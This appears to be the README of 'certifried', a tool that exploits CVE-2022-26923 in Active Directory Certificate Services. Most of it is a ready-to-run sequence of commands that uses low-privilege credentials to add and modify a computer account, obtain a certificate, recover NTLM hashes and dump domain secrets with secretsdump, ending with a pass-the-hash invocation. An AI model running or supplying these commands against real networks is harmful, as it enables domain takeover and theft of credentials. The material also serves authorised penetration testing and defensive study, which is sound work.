Certifried makes steps easier to replicate to abuse the new CVE-2022-26923. However below is the manual steps to replicate the vulnerability. Detailed article can be read here from the original author.
- Just add computer and update neccessary attributes
python3 certifried.py domain.com/lowpriv:'Password1' -dc-ip 10.10.10.10
Next step is to request certificate manually, you can refer here
- Recover NTLM hash
python3 certifried.py domain.com/lowpriv:'Password1' -dc-ip 10.10.10.10 -use-ldap
- Proceed with secretsdump
python3 certifried.py domain.com/lowpriv:'Password1' -dc-ip 10.10.10.10 -computer-name 'ControlledComputer' -computer-pass 'Password123' -use-ldap -dump
Note: If you received an error of Name Service not found, you might wanna add target ip to /etc/hosts
CAVEAT: that this will modify the servicePrincipalName
and dnsHostName
attribute of the current computer account
python3 modify_computer.py range.net/ws01\$@192.168.86.182 -hashes :0e3ae07798e1bc9e02b049a795a7e69f